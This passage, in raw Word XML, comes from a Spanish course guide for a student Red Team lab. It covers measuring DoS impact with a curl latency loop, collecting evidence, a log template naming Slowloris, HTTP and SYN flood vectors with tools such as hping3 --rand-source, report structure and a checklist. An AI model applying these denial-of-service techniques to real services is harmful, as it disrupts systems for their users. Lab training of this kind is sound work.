      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.4 Medición de impacto durante el ataque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mientras un compañero ejecuta el vector, otro mide el impacto desde otra terminal del mismo contenedor o desde un segundo contenedor "observador".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Latencia durante el ataque (loop continuo, redirigido a log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">while true; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  TS=$(date +%H:%M:%S)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  T=$(curl -s -o /dev/null -w "%{http_code}|%{time_total}" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       --max-time 5 http://172.20.0.20/ 2&gt;&amp;1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "$TS | $T" | tee -a /root/loot/impacto_dos.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La salida muestra el código HTTP y el tiempo total por petición. Cuando el servicio empieza a fallar, aparecerán códigos 000 (timeout), 503 o tiempos drásticamente mayores al baseline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.5 Evidencia a recolectar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Tipo de evidencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Cómo capturarla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Línea base de latencia</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Salida de baseline_ab.txt y baseline_curl.txt antes del ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Comando ejecutado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Captura de pantalla de la terminal con el comando completo y timestamp visible.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Salida del ataque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Reporte de slowhttptest, salida de ab, output de hping3 (con --rand-source visible).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Impacto medido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Log de impacto_dos.txt mostrando códigos de error y latencia degradada.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Ventana de tiempo</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Hora exacta de inicio y fin de cada vector. Útil para correlacionar con logs del Blue Team.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Recuperación del servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Mismo loop de medición después de detener el ataque, mostrando regreso a valores normales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.6 Plantilla de bitácora del DoS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada vector se documenta con esta plantilla. Va al anexo del informe final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector:           [Slowloris | HTTP flood | SYN flood]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Operador:         [nombre del miembro que ejecutó]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hora inicio:      HH:MM:SS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hora fin:         HH:MM:SS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Duración real:    XX segundos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando exacto:   &lt;comando&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Latencia base:    XX ms (promedio)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Latencia pico:    XX ms / timeouts observados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Códigos HTTP:     &lt;distribución&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicio caído:   [Sí / No / Degradado]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiempo recuperación: XX segundos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notas del Blue Team: &lt;si reportaron detección&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.7 Cierre de la fase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmar que el servicio recuperó valores normales de latencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notificar al Blue Team el cierre formal de la ventana de DoS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consolidar todas las evidencias en /root/loot/dos/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cruzar la cronología con los logs que el Blue Team haya capturado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Entregables y estructura del informe final</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El proyecto exige al Red Team cuatro entregables específicos. El informe final debe organizarse de forma que cada entregable quede cubierto en una sección identificable. La estructura recomendada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Sección del informe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Entregable que cubre</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Portada y resumen ejecutivo</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Contexto y resultados a alto nivel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Alcance y metodología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Marco de trabajo</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Vulnerabilidades encontradas</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Documento con vulnerabilidades encontradas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Evidencia de ataques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Capturas de pantalla y bitácora</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Descripción de técnicas utilizadas</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Explicación técnica por fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Impacto logrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Accesos, servicios comprometidos, downtime</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Conclusiones y recomendaciones</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Valor agregado para el informe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Anexos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="49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Comandos, scripts, logs completos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 Tabla de vulnerabilidades (formato sugerido)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una sola tabla maestra que el docente pueda leer de un vistazo. Cada fila es una vulnerabilidad concreta con su evidencia y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400"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Servicio afectado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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Evidencia (Fig.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5CFF6" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3C3489"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE / referencia</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&lt;descripción&gt;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&lt;servicio&gt;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Alta / Media / Baja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Fig. X</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CVE-XXXX-XXXX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F7F6F2" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Buenas prácticas y consideraciones finales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Llevar bitácora desde el día 1: timestamp, comando, salida. Es el 80% del informe final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capturas con contexto: terminal completa, no recortes. El docente debe poder reproducir el ataque mentalmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coordinación temprana con el Blue Team: rangos IP, ventanas, reglas de engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backup del trabajo en Git o Drive. Nunca confiar en un único contenedor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes del 16 de mayo (revisión previa): tener un borrador del informe con al menos las secciones 1, 2 y 3 redactadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La calidad del informe pesa tanto como la ejecución técnica. Cinco vulnerabilidades bien documentadas valen más que diez mal explicadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo A — Checklist rápido de ejecución</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Red lab-net creada y funcional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Contenedor Kali corriendo con NET_ADMIN y NET_RAW.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Conectividad confirmada hacia el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Volumen /root/loot montado para evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Coordinación inicial con Blue Team (IPs, ventanas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Recon ejecutado y documentado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Escaneo completo con evidencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Enumeración por servicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[ ] Al menos un ataque de credenciales o web exitoso documentado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
